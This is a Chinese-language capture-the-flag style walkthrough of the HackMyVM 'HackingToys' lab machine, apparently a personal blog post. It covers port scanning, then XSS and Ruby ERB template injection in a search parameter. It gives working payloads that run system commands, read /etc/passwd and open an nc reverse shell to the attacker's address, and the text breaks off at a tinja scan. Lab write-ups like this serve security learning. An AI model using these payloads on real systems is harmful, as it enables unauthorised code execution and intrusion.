{"id":797,"date":"2024-09-07T11:57:44","date_gmt":"2024-09-07T03:57:44","guid":{"rendered":"http:\/\/162.14.82.114\/?p=797"},"modified":"2024-09-07T11:57:44","modified_gmt":"2024-09-07T03:57:44","slug":"hmv-_-hackingtoys","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/797\/09\/07\/2024\/","title":{"rendered":"hmv[-_-]HackingToys"},"content":{"rendered":"<h1>HackingToys<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157954.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157954.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240904145612665\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157956.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157956.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240904151523172\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/HackingToys]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.10.103:22\nOpen 192.168.10.103:3000\nPORT     STATE SERVICE  REASON  VERSION\n22\/tcp   open  ssh      syn-ack OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)\n| ssh-hostkey: \n|   256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLuHH80SwA8Qff3pGOY4aBesL0Aeesw6jqX+pbtR9O7w8jlbyNhuHmjjABb\/34BxFp2oBx8o5xuZVXS1cE9nAlE=\n|   256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICKFE9s2IvPGAJ7Pt0kSC8t9OXYUrueJQQplSC2wbYtY\n3000\/tcp open  ssl\/ppp? syn-ack\n| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd\/stateOrProvinceName=Some-State\/countryName=FR\n| Issuer: organizationName=Internet Widgits Pty Ltd\/stateOrProvinceName=Some-State\/countryName=FR\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2024-05-20T15:36:20\n| Not valid after:  2038-01-27T15:36:20\n| MD5:   6ac6:1f8b:e3f8:dce0:4b1a:d12b:1259:386d\n| SHA-1: c423:6072:834f:77b9:396c:6907:8e29:08d6:f8c7:631d\n| -----BEGIN CERTIFICATE-----\n| MIIDazCCAlOgAwIBAgIUCWBIwc7YlGcff\/jPNV14n8rQolswDQYJKoZIhvcNAQEL\n| BQAwRTELMAkGA1UEBhMCRlIxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM\n| GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0yNDA1MjAxNTM2MjBaFw0zODAx\n| MjcxNTM2MjBaMEUxCzAJBgNVBAYTAkZSMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw\n| HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB\n| AQUAA4IBDwAwggEKAoIBAQDbdGcclY6p5qgtAzPYwsGWj0LANe7g0b6MSQQkFY6Y\n| v9+8UGSOLIU09PFxeeNTdwmMICq3q2bpAc6Qv3Ixuigyv0tqB2DjNMWLemkLvOVd\n| nctKDqfSFo3SjjJmW8e7rTWq\/C4cu6JjR+ME8Ikd0hAqVRFzh0xfzOfWx1dDyN4S\n| ePgBlzV+nGWLXKwsZ2u266JKsVK4\/nkpGPT4SPSYE0w5G8xVMhpfqpu2juBPJyRV\n| fbzap1YCn+QWSnD6ku0ZQ0YXwAfyPiOSilFQJe4\/ZIYBgjJZH6w+DbBRLghDVgJ5\n| 5afmOjXZQA0TdQPfF2pUlAf7H07QoHhcTXgiNL82bKB9AgMBAAGjUzBRMB0GA1Ud\n| DgQWBBShpGMQrHmIzxxDoytRa\/d9GMFfJTAfBgNVHSMEGDAWgBShpGMQrHmIzxxD\n| oytRa\/d9GMFfJTAPBgNVHRMBAf8EBTADAQH\/MA0GCSqGSIb3DQEBCwUAA4IBAQBa\n| nEYqR+Z0ybI+C6dD9bOSZMrEHzzRvoIXw2Pgqj4DMVdx2ZEpoMvvn36xeV8JQmrk\n| obYrcyBdkUWhdpjMWK6fXtKQ4Dp\/O6D0RLdER8FYZCI0r\/yy5GCeeDloKiexHDq9\n| kuJ6lPoBFDIEK++h9eEvhVw2frL6f+ZBD486klmPhRi8hsxnE4O+olCpCjMLCzfM\n| E4l711CWj0pDTMeOfdxps1WaNsDIx\/tOqsERNqjIfcgmrPKsFTFtS\/sofcCdJ7lq\n| RXHpfM1vyRVHEmjNax4qePvpQAgdDcem87KLdDKzFAx\/FLTOrn3MLOj8d7XnjJZR\n| vozWyeMFGA20aSOApTH3\n|_-----END CERTIFICATE-----\n|_ssl-date: TLS randomness does not represent time\n| fingerprint-strings: \n|   GenericLines: \n|     HTTP\/1.0 400 Bad Request\n|     Content-Length: 930\n|     Puma caught this error: Invalid HTTP format, parsing fails. Are you trying to open an SSL connection to a non-SSL Puma? (Puma::HttpParserError)\n|     \/usr\/local\/rvm\/gems\/ruby-3.1.0\/gems\/puma-6.4.2\/lib\/puma\/client.rb:268:in `execute&#039;\n|     \/usr\/local\/rvm\/gems\/ruby-3.1.0\/gems\/puma-6.4.2\/lib\/puma\/client.rb:268:in `try_to_finish&#039;\n|     \/usr\/local\/rvm\/gems\/ruby-3.1.0\/gems\/puma-6.4.2\/lib\/puma\/server.rb:298:in `reactor_wakeup&#039;\n|     \/usr\/local\/rvm\/gems\/ruby-3.1.0\/gems\/puma-6.4.2\/lib\/puma\/server.rb:248:in `block in run&#039;\n|     \/usr\/local\/rvm\/gems\/ruby-3.1.0\/gems\/puma-6.4.2\/lib\/puma\/reactor.rb:119:in `wakeup!&#039;\n|     \/usr\/local\/rvm\/gems\/ruby-3.1.0\/gems\/puma-6.4.2\/lib\/puma\/reactor.rb:76:in `block in select_loop&#039;\n|     \/usr\/local\/rvm\/gems\/ruby-3.1.0\/gems\/puma-6.4.2\/lib\/puma\/reactor.rb:76:in `select&#039;\n|     \/usr\/local\/rvm\/gems\/ruby-3.1.0\/gems\/puma-6.4.2\/lib\/puma\/reactor.rb:76:in `select_loop&#039;\n|     \/usr\/loc\n|   GetRequest: \n|     HTTP\/1.0 403 Forbidden\n|     content-type: text\/html; charset=UTF-8\n|     Content-Length: 5702\n|     &lt;!DOCTYPE html&gt;\n|     &lt;html lang=&quot;en&quot;&gt;\n|     &lt;head&gt;\n|     &lt;meta charset=&quot;utf-8&quot; \/&gt;\n|     &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1&quot;&gt;\n|     &lt;meta name=&quot;turbo-visit-control&quot; content=&quot;reload&quot;&gt;\n|     &lt;title&gt;Action Controller: Exception caught&lt;\/title&gt;\n|     &lt;style&gt;\n|     body {\n|     background-color: #FAFAFA;\n|     color: #333;\n|     color-scheme: light dark;\n|     supported-color-schemes: light dark;\n|     margin: 0px;\n|     body, p, ol, ul, td {\n|     font-family: helvetica, verdana, arial, sans-serif;\n|     font-size: 13px;\n|     line-height: 18px;\n|     font-size: 11px;\n|     white-space: pre-wrap;\n|     pre.box {\n|     border: 1px solid #EEE;\n|     padding: 10px;\n|     margin: 0px;\n|     width: 958px;\n|     header {\n|     color: #F0F0F0;\n|     background: #C00;\n|_    padding:\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port3000-TCP:V=7.94SVN%T=SSL%I=7%D=9\/4%Time=66D80951%P=x86_64-pc-linux-\nSF:gnu%r(GenericLines,3EF,&quot;HTTP\/1\\.0\\x20400\\x20Bad\\x20Request\\r\\nContent-L\nSF:ength:\\x20930\\r\\n\\r\\nPuma\\x20caught\\x20this\\x20error:\\x20Invalid\\x20HTT\nSF:P\\x20format,\\x20parsing\\x20fails\\.\\x20Are\\x20you\\x20trying\\x20to\\x20ope\nSF:n\\x20an\\x20SSL\\x20connection\\x20to\\x20a\\x20non-SSL\\x20Puma\\?\\x20\\(Puma:\nSF::HttpParserError\\)\\n\/usr\/local\/rvm\/gems\/ruby-3\\.1\\.0\/gems\/puma-6\\.4\\.2\/\nSF:lib\/puma\/client\\.rb:268:in\\x20`execute&#039;\\n\/usr\/local\/rvm\/gems\/ruby-3\\.1\\\nSF:.0\/gems\/puma-6\\.4\\.2\/lib\/puma\/client\\.rb:268:in\\x20`try_to_finish&#039;\\n\/us\nSF:r\/local\/rvm\/gems\/ruby-3\\.1\\.0\/gems\/puma-6\\.4\\.2\/lib\/puma\/server\\.rb:298\nSF::in\\x20`reactor_wakeup&#039;\\n\/usr\/local\/rvm\/gems\/ruby-3\\.1\\.0\/gems\/puma-6\\.\nSF:4\\.2\/lib\/puma\/server\\.rb:248:in\\x20`block\\x20in\\x20run&#039;\\n\/usr\/local\/rvm\nSF:\/gems\/ruby-3\\.1\\.0\/gems\/puma-6\\.4\\.2\/lib\/puma\/reactor\\.rb:119:in\\x20`wa\nSF:keup!&#039;\\n\/usr\/local\/rvm\/gems\/ruby-3\\.1\\.0\/gems\/puma-6\\.4\\.2\/lib\/puma\/rea\nSF:ctor\\.rb:76:in\\x20`block\\x20in\\x20select_loop&#039;\\n\/usr\/local\/rvm\/gems\/rub\nSF:y-3\\.1\\.0\/gems\/puma-6\\.4\\.2\/lib\/puma\/reactor\\.rb:76:in\\x20`select&#039;\\n\/us\nSF:r\/local\/rvm\/gems\/ruby-3\\.1\\.0\/gems\/puma-6\\.4\\.2\/lib\/puma\/reactor\\.rb:76\nSF::in\\x20`select_loop&#039;\\n\/usr\/loc&quot;)%r(GetRequest,169E,&quot;HTTP\/1\\.0\\x20403\\x2\nSF:0Forbidden\\r\\ncontent-type:\\x20text\/html;\\x20charset=UTF-8\\r\\nContent-L\nSF:ength:\\x205702\\r\\n\\r\\n&lt;!DOCTYPE\\x20html&gt;\\n&lt;html\\x20lang=\\&quot;en\\&quot;&gt;\\n&lt;head&gt;\nSF:\\n\\x20\\x20&lt;meta\\x20charset=\\&quot;utf-8\\&quot;\\x20\/&gt;\\n\\x20\\x20&lt;meta\\x20name=\\&quot;vie\nSF:wport\\&quot;\\x20content=\\&quot;width=device-width,\\x20initial-scale=1\\&quot;&gt;\\n\\x20\\x2\nSF:0&lt;meta\\x20name=\\&quot;turbo-visit-control\\&quot;\\x20content=\\&quot;reload\\&quot;&gt;\\n\\x20\\x20\nSF:&lt;title&gt;Action\\x20Controller:\\x20Exception\\x20caught&lt;\/title&gt;\\n\\x20\\x20&lt;s\nSF:tyle&gt;\\n\\x20\\x20\\x20\\x20body\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20background-co\nSF:lor:\\x20#FAFAFA;\\n\\x20\\x20\\x20\\x20\\x20\\x20color:\\x20#333;\\n\\x20\\x20\\x20\nSF:\\x20\\x20\\x20color-scheme:\\x20light\\x20dark;\\n\\x20\\x20\\x20\\x20\\x20\\x20su\nSF:pported-color-schemes:\\x20light\\x20dark;\\n\\x20\\x20\\x20\\x20\\x20\\x20margi\nSF:n:\\x200px;\\n\\x20\\x20\\x20\\x20}\\n\\n\\x20\\x20\\x20\\x20body,\\x20p,\\x20ol,\\x20\nSF:ul,\\x20td\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20font-family:\\x20helvetica,\\x20v\nSF:erdana,\\x20arial,\\x20sans-serif;\\n\\x20\\x20\\x20\\x20\\x20\\x20font-size:\\x2\nSF:0\\x20\\x2013px;\\n\\x20\\x20\\x20\\x20\\x20\\x20line-height:\\x2018px;\\n\\x20\\x20\nSF:\\x20\\x20}\\n\\n\\x20\\x20\\x20\\x20pre\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20font-siz\nSF:e:\\x2011px;\\n\\x20\\x20\\x20\\x20\\x20\\x20white-space:\\x20pre-wrap;\\n\\x20\\x2\nSF:0\\x20\\x20}\\n\\n\\x20\\x20\\x20\\x20pre\\.box\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20bo\nSF:rder:\\x201px\\x20solid\\x20#EEE;\\n\\x20\\x20\\x20\\x20\\x20\\x20padding:\\x2010p\nSF:x;\\n\\x20\\x20\\x20\\x20\\x20\\x20margin:\\x200px;\\n\\x20\\x20\\x20\\x20\\x20\\x20wi\nSF:dth:\\x20958px;\\n\\x20\\x20\\x20\\x20}\\n\\n\\x20\\x20\\x20\\x20header\\x20{\\n\\x20\\\nSF:x20\\x20\\x20\\x20\\x20color:\\x20#F0F0F0;\\n\\x20\\x20\\x20\\x20\\x20\\x20backgrou\nSF:nd:\\x20#C00;\\n\\x20\\x20\\x20\\x20\\x20\\x20padding:&quot;);\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<p>\u987a\u4fbf\u626b\u4e00\u4e0budp\u7aef\u53e3\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/HackingToys]\n\u2514\u2500$ sudo nmap -sU -sT -T4 --top-ports 100 $IP              \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-09-04 03:26 EDT\nWarning: 192.168.10.103 giving up on port because retransmission cap hit (6).\nStats: 0:01:07 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan\nUDP Scan Timing: About 85.71% done; ETC: 03:28 (0:00:08 remaining)\nNmap scan report for 192.168.10.103\nHost is up (0.0029s latency).\nNot shown: 98 closed tcp ports (conn-refused), 82 closed udp ports (port-unreach)\nPORT      STATE         SERVICE\n22\/tcp    open          ssh\n3000\/tcp  open          ppp\n68\/udp    open|filtered dhcpc\n88\/udp    open|filtered kerberos-sec\n120\/udp   open|filtered cfdptkt\n135\/udp   open|filtered msrpc\n158\/udp   open|filtered pcmail-srv\n500\/udp   open|filtered isakmp\n518\/udp   open|filtered ntalk\n996\/udp   open|filtered vsinet\n1025\/udp  open|filtered blackjack\n1028\/udp  open|filtered ms-lsa\n1813\/udp  open|filtered radacct\n2000\/udp  open|filtered cisco-sccp\n2049\/udp  open|filtered nfs\n2223\/udp  open|filtered rockwell-csp2\n5060\/udp  open|filtered sip\n33281\/udp open|filtered unknown\n49156\/udp open|filtered unknown\n49185\/udp open|filtered unknown\nMAC Address: 08:00:27:35:CF:CE (Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 99.85 seconds<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157957.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157957.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240907101049597\" style=\"zoom:33%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">https:\/\/192.168.10.101:3000\/products\/show\/1\nhttps:\/\/192.168.10.101:3000\/products\/show\/2\nhttps:\/\/192.168.10.101:3000\/products\/show\/3\nhttps:\/\/192.168.10.101:3000\/products\/show\/4\nhttps:\/\/192.168.10.101:3000\/products\/show\/5\nhttps:\/\/192.168.10.101:3000\/search?query=aaaaa&amp;message=Product+does+not+exist<\/code><\/pre>\n<p>\u4e94\u79cd\u8fd1\u6e90\u6e17\u900f\u5de5\u5177\uff0c\u8fd8\u6709\u4e00\u4e2a\u641c\u7d22\u6846\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157958.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157958.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240907101347822\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u7591\u4f3c\u5b58\u5728xss\u6ce8\u5165\u6f0f\u6d1e\uff0c\u968f\u4fbf\u8f93\u5165\u76ee\u5f55\u4f1a\u51fa\u73b0\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157959.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157959.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240907101743045\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157960.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157960.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240907101804627\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u662f\u4e00\u4e2a<code>ruby<\/code>\u7684\u76f8\u5173\u7f51\u9875\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157961.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157961.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240907103018432\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h3>XSS+SSTI(ERB)<\/h3>\n<p>\u5c1d\u8bd5\u4e00\u4e0b\u662f\u5426\u53ef\u4ee5\u6267\u884c\u76f8\u5173xss\u547d\u4ee4\uff1a<a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/xss-cross-site-scripting#injecting-inside-raw-html\">https:\/\/book.hacktricks.xyz\/pentesting-web\/xss-cross-site-scripting#injecting-inside-raw-html<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157962.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157962.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240907102029428\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u6267\u884c\u76f8\u5173\u547d\u4ee4\uff0c\u5c1d\u8bd5\u6a21\u677f\u6ce8\u5165\uff1a<\/p>\n<p><a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/ssti-server-side-template-injection#erb-ruby\">https:\/\/book.hacktricks.xyz\/pentesting-web\/ssti-server-side-template-injection#erb-ruby<\/a><\/p>\n<pre><code class=\"language-text\">&lt;%= 7*7 %&gt;\n%3C%25%3D%207%2A7%20%25%3E<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157963.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157963.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240907103559313\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u6267\u884c\u6210\u529f\uff01<\/p>\n<pre><code class=\"language-text\">&lt;%= system(&quot;whoami&quot;) %&gt;\n%3C%25%3D%20system%28%22whoami%22%29%20%25%3E\ntrue\n\n&lt;%= system(&#039;cat \/etc\/passwd&#039;) %&gt;\n%3C%25%3D%20system%28%27cat%20%2Fetc%2Fpasswd%27%29%20%25%3E\ntrue<\/code><\/pre>\n<p>\u53d1\u73b0\u53ea\u80fd\u6267\u884c\u5f97\u5230true\u7ed3\u679c\uff0c\u4f3c\u4e4e\u6807\u5fd7\u7740\u6267\u884c\u6210\u529f\uff1f\u5c1d\u8bd5\u53cd\u5f39shell\uff1a<\/p>\n<pre><code class=\"language-bash\">&lt;%= system(&#039;nc -e \/bin\/bash 192.168.10.102 1234&#039;) %&gt;\n%3C%25%3D%20system%28%27nc%20%2De%20%2Fbin%2Fbash%20192%2E168%2E10%2E102%201234%27%29%20%25%3E<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157964.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157964.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240907104304272\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u5176\u4ed6\u529e\u6cd5<\/h3>\n<p>\u542ctao\u795e\u8bf4\u4f3c\u4e4e\u53ef\u4ee5\u5de5\u5177\u4e00\u628a\u68ad\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/HackingToys]\n\u2514\u2500$ tinja url -u &quot;https:\/\/192.168.10.101:3000\/search?query=121&amp;message=Product+does+not+exist&quot;                   \nTInjA v1.1.3 started at 